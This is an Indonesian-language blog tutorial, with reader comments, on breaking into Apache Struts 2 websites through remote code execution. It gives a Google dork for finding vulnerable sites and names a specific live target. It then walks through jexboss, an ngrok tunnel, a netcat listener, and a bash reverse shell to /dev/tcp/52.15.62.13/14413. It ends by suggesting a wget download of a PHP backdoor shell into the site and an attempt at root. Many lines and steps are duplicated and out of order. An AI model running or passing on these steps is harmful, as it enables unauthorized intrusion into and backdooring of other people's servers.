Hallo Pada kesempatan kali ini RCE lagi dan ini untuk versi Apache Struts 2
Langsung saja cekidot!!!
7. Setelah di enter, buka cmd yang tadi listening 123 (nc-lnvp 123)
Langsung saja cekidot!!!
Remote Code Execution Apache Struts2
Bahan-bahan nya :
-Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
-Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Extrack semuanya
1. Langkah pertama pastinya dorking di google.com
dengan dork di atas atau di bawah ini (sama aja asw-_-)
dengan dork di atas atau di bawah ini (sama aja asw-_-)
intitle:"Struts Problem Report" intext:"development mode is enabled."
dan pilih salah satu website
Target saya ialah
http://gaqm.org:8080/gaqm/chrmcss/admin-ajax
http://gaqm.org:8080/gaqm/chrmcss/admin-ajax
2. Kemudian buka command prompt lalu ke folder jexboss nya
3. Yang ketiga ketikan:
python jexboss.py -u urltarger/bla/.com
python jexboss.py -u urltarger/bla/.com
kalau tidak bisa pythonnya hapus jadi jexboss.py -u urltarger/bla/.com
kemudian enter, dan jika ada tulisan VULNERABLE pada struts2 maka web tersebut vuln
kemudian enter, dan jika ada tulisan VULNERABLE pada struts2 maka web tersebut vuln
Kemudian ketik yes
4. Lalu setelah klik yes tadi, tinggalkan sejenak jexbossnya dan buka cmd baru kemudian arahkan pada file ngrok yang tadi anda download jangan lupa regist dulu di https://ngrok.com/
Lalu ketikan:
ngrok.exe tcp 123
ngrok.exe tcp 123
lalu enter
Tampilan ngrok Setelah di Enter
5. setelah tersambung kemudian buka cmd lagi dan arahkan pada folder netcat nya
lalu ketikan:
nc -lnvp 123
kemudian enter
lalu ketikan:
nc -lnvp 123
kemudian enter
6. Setelah itu kembali lagi pada cmd yang jexboss tadi lalu ketikan:
/bin/bash -i > /dev/tcp/52.15.62.13/port anda yang di ngrok 0>&1 2>&1\n
contoh punya saya:
/bin/bash -i > /dev/tcp/52.15.62.13/14413 0>&1 2>&1\n
/bin/bash -i > /dev/tcp/52.15.62.13/port anda yang di ngrok 0>&1 2>&1\n
contoh punya saya:
/bin/bash -i > /dev/tcp/52.15.62.13/14413 0>&1 2>&1\n
Lalu enter
7. Setelah di enter, buka cmd yang tadi listening 123 (nc-lnvp 123)
Lalu coba anda ketikan perintah uname -a lalu enter
maka hasilnya akan seperti ini
maka hasilnya akan seperti ini
Oke baiklah dengan begini anda sudah masuk pada direktory web tersebut,
coba anda ketik ls maka akan tampil directory nya, apabila anda ingin memasang shell backdoor anda bisa memakai perintah wget https://webygadashellnya.com/shelanda.php
dan arahkan pada public_html web tersebut. ketik saja cd / maka anda akan berada pada directory awal, dan kalo hokki bisa di root severnya
Sekian TerimaKasih
coba anda ketik ls maka akan tampil directory nya, apabila anda ingin memasang shell backdoor anda bisa memakai perintah wget https://webygadashellnya.com/shelanda.php
dan arahkan pada public_html web tersebut. ketik saja cd / maka anda akan berada pada directory awal, dan kalo hokki bisa di root severnya
Sekian TerimaKasih
RCE is very difficult
ReplyNah ini baru jelas tutornya ...
Replysangat membantu
Terima Kasih sudah berkomentar :)
ReplySangat Membantu
ReplyNice turorial
ReplyUdah dikit yg bisa di exploit
ReplyVisit back
Reply